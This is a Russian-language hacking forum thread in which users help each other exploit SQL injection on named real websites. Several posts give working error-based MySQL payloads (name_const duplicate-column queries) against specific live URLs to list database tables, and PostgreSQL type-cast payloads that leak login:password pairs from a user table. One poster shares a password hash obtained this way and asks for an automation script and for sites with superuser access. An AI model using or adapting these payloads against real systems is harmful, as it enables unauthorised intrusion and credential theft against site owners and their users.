Ваши вопросы по уязвимостям.

Направляете мышкой на ссылку, зажимаете левую кнопку и тянете пока не выделиться вся ссылка. Потом, нажимаете пальцами на клавиатуре сочитание клавиш, сначала "ctrl", потом не отпуская "ctrl" (понимаю это трудно, но что делать) нажимаете кнопочку "c" и в адресной строке браузера нажимаете "ctrl"+"v", далее жмякаете enter и вуаля вы внутри сайта. Если что непонятно, пишите в пм, объясню подробно.
зы. Надеюсь помог.

 

Очень смешно...

Если не трудно помогите раскрутить.

 

там int или intval скорее всего, просто нет проверки на "-", то бишь вряд ли там (конкретно по этой ссылке) есть скуля

 

а 4то зделать в таком ситуации ??

 

Code:

http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const(version(),1),name_const(version(),1))a)

 

вроде еррор есть но дальше ничего... что можно придумать?

 

Где "еррор"? Отображается до кавычки и после одинаково.

 

Подскажите с конструкцией типа:

выдает логин

неверный входной синтаксис для типа boolean: "$1$rTat6wug$Qvx2HyTZNNKWYJnmszCP31" in /usr/ и т.д
т.е выдает только пароль
----------------
Как вывести информацию в виде loginasswd?

И подскажите скрипт для перебора limit offset с аутентификацией и работой с https? если таковой имеется

 

Warning: Invalid argument supplied for foreach() in /usr/home/krutomer/krutomer.ru/html/city.php on line 301

в опере отображается а вот в мозилле нет )

 

разобраться в чем? в конструкции нового самолета компании?

 

samarin

Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean

 

о4ень спасибо ну моjэт подробнее ??

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1

 

Например, так

Code:

select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----

или так

Code:

select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----

 

krypt3r
Спасибо! Вы как всегда на высоте
Spyder

Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...)

И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей

 

Помогите здесь скулю раскрутить:
http://zub.by/menu.php?form_id=1
Ввожу количество полей и всегда ошибка.

 

Code:

http://zub.by/menu.php?form_id=(select*from(select+name_const(version(),1),name_const(version(),1))a)

 

Pashkela У меня ошибка при таком вводе
А зависит ли это от браузера?

 

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

Code:

http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)


http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+1,1),1),name_const((select+table_name+from+information_schema.tables+limit+1,1),1))a)

.....

 

У меня ничего подобного, вот смотри, что у меня:

 

э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ